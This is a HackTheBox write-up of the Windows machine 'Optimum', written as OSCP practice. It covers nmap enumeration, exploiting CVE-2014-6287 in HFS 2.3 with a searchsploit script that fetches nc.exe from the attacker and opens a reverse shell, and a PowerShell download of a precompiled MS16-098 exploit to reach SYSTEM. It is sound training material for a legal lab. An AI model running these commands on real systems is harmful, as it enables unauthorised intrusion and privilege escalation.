HacktheBox - Optimum Writeup

08/10/2019

Zero to OSCP Hero Writeup #8 - Optimum

Reconnaissance

1. Nmap Scan - TCP Scan 

Let's start with a TCP scan of the target ip address to determine which ports are open and which services are running on those ports: 

nmap -sC -sV -oA nmap/initial.tcp 10.10.10.8

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -oA: Output the result of the scan in all formats as nmap/initial.tcp 

As you can see, only one port is open, port 80 which is running an outdated version of HttpFileServer 2.3

2. Nmap Scan - All TCP Ports Scan 

Okay, lets scan the entire TCP port range to confirm that there are no other ports open:

nmap -sC -sV -p- -oA nmap/full.tcp 10.10.10.8

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -p-: Run the nmap scan against all ports 
  • -oA: Output the result of the scan in all formats as nmap/full.tcp 

Okay, so this confirms that port 80 is the only TCP port open. 

3. Nmap Scan - All UDP Ports Scan 

We can do the same full port scan, but with the UDP ports: 

nmap -sU -p- -oA nmap/full.udp 10.10.10.8

  • -sU: Run the scan against UDP ports  
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.tcp 

Enumeration

1. Enumerating Port 80  

Lets see what we encounter when browsing to the HTTP File Server:

On first impressions, The File Server seems to be used to access/archive files over the network. There is also a login tab, which may be vulnerable credential stuffing... Lets look more into the HttpFileServer 2.3 version.   

2. Enumerating HttpFileServer 2.3 version

Okay, so after looking at google and searchsploit, it shows that there are multiple exploits available for the HFS version, 2.3: 

searchsploit Http File Server 2.3

Lets look at the HFS 2.3.x - Remote Command Execution (2) python script in more detail and see if we can understand what the exploit is doing:

 searchsploit -x exploits/windows/remote/39161.py

As you can see, the text in purple is URL encoded, lets decode this to make it easier to read, using an online URL decoder:

Okay, lets concentrate on the three functions being called: 

  • script_create(): This creates a script, script.vbs that when executed, downloads nc.exe from the attackers machine, and saves it in the directory, C:\Users\Public\nc.exe on the target machine. 
  • execute_script(): It uses csscript.exe to execute script.vbs 
  • nc_run(): This runs the nc.exe executable, which creates a reverse shell with the attacker machine via the attackers netcat listener.  

The NIST website also explains how the RCE for CVE-2014-6287 actually works: 

"The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action"

This is the reason why we see %00 before the arbitary code is executed in the function commands in the URL encoded script: 

Initial Foothold - User 

1. Copy and Edit Exploit

Now we have found the exploit we want to use via searchsploit, we need to copy the exploit to our current directory:

 searchsploit -m exploits/windows/remote/39161.py

  • -m: Copy an exploit to the current working directory

Asd we now know that the exploit wants to download nc.exe from our attacker machine, we need to locate nc.exe on our machine and start a HTTP web server in its directory:

locate nc.exe 

cd /usr/share/windows-resources/binaries/

python -m SimpleHTTPServer 8000

We now need to edit the exploit and add our tun0 IP address and custom TCP port:  

nano 39161.py

We can now start a netcat listener on port 9001:

nc -lvnp 9001

... And execute the exploit! 

python 39161.py 10.10.10.8 80

We now have a non-privileged shell on the target machine as the user, Kostas!  

We can now grab the user.txt flag!

more user.txt.txt

Privilege Escalation - Root  

Now we have an initial foothold on the machine, we need to elevate our privileges! 

1. Manually Checking for Priv Esc Route

I like to manually check things first before going for the automated scripts, I recommend this windows priv esc guide for OSCP. 

After going through various commands manually, there was nothing obvious that could help in gaining priv esc, so lets see what Windows Exploit Suggester can suggest. 

2. Windows Exploit Suggester

Okay so lets grab the python script from its github page

git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git

Once we have it cloned on our machine, we need to update the database and install some dependencies, these can be found in the readme file: 

./windows-exploit-suggester.py --update

pip install xlrd --upgrade 

Before we can run the exploit suggester, we need to copy the contents of the targets systeminfo command to our machine.

C:\Users\kostas\Desktop>systeminfo

Create a text file, systeminfo.txt and copy the systeminfo contents into it. We need to place the created text file in the Windows-Exploit-Suggester directory on our machine.  

We need to also take note of the Excel database as this is what the systeminfo.txt contents is compared against.  

We are now ready to run the python script! 

./windows-exploit-suggester.py --database 2019-10-08-mssb.xls --systeminfo systeminfo.txt

So as the exploit shows, there are over 246 vulnerabilities on this machine! 

3. Using the MS16-098 exploit to Priv Esc

After viewing multiple exploits, I eventually found that MS16-098 is a viable option for Priv Esc and it comes as an already complied executable. 

Lets download the exploit to our attacker machine: 

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

Now that we have the exploit on our attacker machine, we need to get it on to the target machine to exploit it, so we need to start another HTTP Server: 

python -m SimpleHTTPServer 8001

On the target machine, we need to use a directory our current user has write access to, and download the exploit from our attacker machine: 

powershell -c "(new-object System.Net.WebClient).DownloadFile('https://10.10.14.9:8001/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"

Now we can execute the exploit: 

41020.exe

Sure enough... We are now running as SYSTEM! 

whoami

We can now grab the root flag! 

more root.txt 

What did I learn from Optimum? 

Patching and keeping systems and software up to date is critical! 

Conclusion

And that is now 8 of the OSCP like boxes completed, next up - Nibbles!